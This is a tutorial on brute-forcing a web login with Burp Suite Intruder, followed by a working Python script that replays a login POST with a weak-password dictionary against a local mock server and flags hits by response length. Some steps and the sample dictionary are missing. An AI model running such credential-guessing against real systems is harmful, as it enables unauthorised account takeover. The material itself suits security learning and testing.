Burp, properly Burp Suite, is an integrated platform for attacking web applications. It contains a number of tools that can intercept HTTP requests, brute-force ("blast") parameters, and scan for vulnerabilities.
The steps for capturing a login request and brute-forcing it with Intruder are listed below:
2: Turn on the browser's proxy.
3: Configure the Burp proxy listener address and port; they must match the browser's proxy settings (Burp's default listener is 127.0.0.1:8080).
4: With Intercept turned on, go to the login page to capture the request. Fill in a login name and password, click login, and observe the HTTP request intercepted by Burp.
On the intercepted request, right-click and choose Send to Intruder.
Now click the Intruder tab, then Positions, and observe the page. The places wrapped in § markers have become payload positions (variables); by default Burp marks every parameter.
Clear all the automatically marked positions (Clear §) and mark only the field we actually want to vary (Add §).
Take note of the attack type: with a single payload position, Sniper is the one to use. Here we only mark the username field as a payload position.
After the payload position is marked, switch to the Payloads tab, set the payload type to Runtime file or Simple list, then click Load to load the weak password dictionary.
A weak password dictionary is a plain text file of common, simple passwords, one per line, as follows:
Loading a weak password file
Click Start attack under Intruder to start brute-forcing, and observe the results.
Sort the results by the Length column: almost every failed login returns the same response length, so the two rows whose length differs from the rest are the ones worth looking at. A different status code is another signal to watch for.
Trying these two values on the login page by hand verified that they logged us in successfully.
One reminder: if the dictionary is large, the attack takes a long time (and the Community edition throttles Intruder), so you need to be patient.
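The Intruder run above, rebuilt as a script, as an added example that is not part of the original tutorial: a small local HTTP login endpoint (constructed here, not a real target) stands in for the application, the client replays the captured POST with each dictionary entry in the single payload position (Sniper), and the results are sorted by response length so the odd one out stands out just as it does in Intruder's Length column. The field names `username`/`password`, the `/login` path, the dictionary and the valid credential `admin`/`admin123` are all assumptions made for the mock.

```python
"""Scripted equivalent of a Burp Intruder Sniper attack on a login form.

Everything here is constructed for the example: the mock server, the
dictionary and the accepted credential. Swap `sniper_attack`'s URL and
fixed parameters for a real captured request when using it for real.
"""
import threading
from collections import Counter
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.parse import parse_qs, urlencode
from urllib.request import Request, urlopen

# Constructed weak-password dictionary (stands in for the loaded runtime file).
WEAK_PASSWORDS = ["123456", "password", "admin", "12345678",
                  "qwerty", "admin123", "letmein", "welcome"]

# Constructed credential the mock endpoint accepts (assumption for the demo).
_VALID = {"admin": "admin123"}


class LoginHandler(BaseHTTPRequestHandler):
    """Mock /login: 200 on both success and failure, but the success page is
    longer. That length difference is exactly what sorting by Length finds."""

    def do_POST(self):
        size = int(self.headers.get("Content-Length", 0))
        form = parse_qs(self.rfile.read(size).decode())
        user = form.get("username", [""])[0]
        pwd = form.get("password", [""])[0]
        if _VALID.get(user) == pwd:
            body = (b"<html><body><h1>Welcome back, " + user.encode() +
                    b"</h1><a href='/logout'>Logout</a></body></html>")
        else:
            body = b"<html><body>Login failed</body></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the console quiet during the run
        pass


def start_mock_server():
    """Bind the mock on a free loopback port and serve it from a daemon thread."""
    server = HTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def sniper_attack(url, fixed_params, position, wordlist):
    """One request per payload; only the form field named `position` varies
    (Sniper), every other field keeps its captured value.
    Returns a list of (payload, status_code, response_length)."""
    results = []
    for payload in wordlist:
        form = dict(fixed_params, **{position: payload})
        req = Request(url, data=urlencode(form).encode(),
                      headers={"Content-Type": "application/x-www-form-urlencoded"})
        try:
            with urlopen(req, timeout=5) as resp:
                results.append((payload, resp.status, len(resp.read())))
        except HTTPError as err:  # 401/403 on failure is a result too, not an error
            results.append((payload, err.code, len(err.read())))
    return results


def find_anomalies(results):
    """Mimic 'sort by Length' in Intruder: the most common response length is
    the failure page; anything else is a candidate to try by hand."""
    common_len = Counter(length for _, _, length in results).most_common(1)[0][0]
    return [r for r in results if r[2] != common_len]


if __name__ == "__main__":
    srv = start_mock_server()
    url = f"http://127.0.0.1:{srv.server_port}/login"
    res = sniper_attack(url, {"username": "admin"}, "password", WEAK_PASSWORDS)
    for payload, status, length in sorted(res, key=lambda r: r[2]):
        print(f"{payload:<12} {status} {length}")
    print("candidates:", [p for p, _, _ in find_anomalies(res)])
    srv.shutdown()
```

The payload position is a parameter, so the same function varies the username field instead by passing `position="username"` with a fixed password. `find_anomalies` keys on the most common length because the failure response dominates a dictionary run; against a target that pads or randomises responses you would compare status codes, redirects or a keyword in the body instead.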